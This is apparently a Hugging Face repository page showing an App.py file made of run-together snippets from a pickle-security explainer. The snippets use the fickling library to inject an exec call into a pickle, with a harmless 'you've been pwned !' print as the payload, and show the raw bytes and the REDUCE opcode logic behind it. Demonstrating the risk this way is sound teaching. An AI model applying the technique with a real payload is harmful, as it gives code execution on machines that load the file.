VKcyber8k
/

Vd.01

Model card Files Files and versions

Vd.01 / App.py

VKcyber8k's picture

Create App.py

4b8f474 about 3 years ago

history blame contribute delete

2.7 kB

	import pickle
	import pickletools

	var = "data I want to share with a friend"

	# store the pickle data in a file named 'payload.pkl'
	with open('payload.pkl', 'wb') as f:
	pickle.dump(var, f)

	# disassemble the pickle
	# and print the instructions to the command line
	with open('payload.pkl', 'rb') as f:
	pickletools.dis(f) 0: \x80 PROTO 4
	2: \x95 FRAME 48
	11: \x8c SHORT_BINUNICODE 'data I want to share with a friend'
	57: \x94 MEMOIZE (as 0)
	58: . STOP
	highest protocol among opcodes = 4import pickle
	import pickletools

	class Data:
	def __init__(self, important_stuff: str):
	self.important_stuff = important_stuff

	d = Data("42")

	with open('payload.pkl', 'wb') as f:
	pickle.dump(d, f)from fickling.pickle import Pickled
	import pickle

	# Create a malicious pickle
	data = "my friend needs to know this"

	pickle_bin = pickle.dumps(data)

	p = Pickled.load(pickle_bin)

	p.insert_python_exec('print("you\'ve been pwned !")')

	with open('payload.pkl', 'wb') as f:
	p.dump(f)

	# innocently unpickle and get your friend's data
	with open('payload.pkl', 'rb') as f:
	data = pickle.load(f)
	print(data)you've been pwned !
	my friend needs to know this# cat payload.pkl
	c__builtin__
	exec
	(Vprint("you've been pwned !")
	tR my friend needs to know this.%

	# hexyl payload.pkl
	┌────────┬─────────────────────────┬─────────────────────────┬────────┬────────┐
	│00000000│ 63 5f 5f 62 75 69 6c 74 ┊ 69 6e 5f 5f 0a 65 78 65 │c__built┊in___exe│
	│00000010│ 63 0a 28 56 70 72 69 6e ┊ 74 28 22 79 6f 75 27 76 │c_(Vprin┊t("you'v│
	│00000020│ 65 20 62 65 65 6e 20 70 ┊ 77 6e 65 64 20 21 22 29 │e been p┊wned !")│
	│00000030│ 0a 74 52 80 04 95 20 00 ┊ 00 00 00 00 00 00 8c 1c │_tR×•× 0┊000000×•│
	│00000040│ 6d 79 20 66 72 69 65 6e ┊ 64 20 6e 65 65 64 73 20 │my frien┊d needs │
	│00000050│ 74 6f 20 6b 6e 6f 77 20 ┊ 74 68 69 73 94 2e │to know ┊this×. │
	└────────┴─────────────────────────┴─────────────────────────┴────────┴────────┘# ...
	opcodes_stack = [exec_func, "malicious argument", "REDUCE"]
	opcode = stack.pop()
	if opcode == "REDUCE":
	arg = opcodes_stack.pop()
	callable = opcodes_stack.pop()
	opcodes_stack.append(callable(arg))
	# ...from transformers import AutoModel

	model = AutoModel.from_pretrained("bert-base-cased", from_flax=True)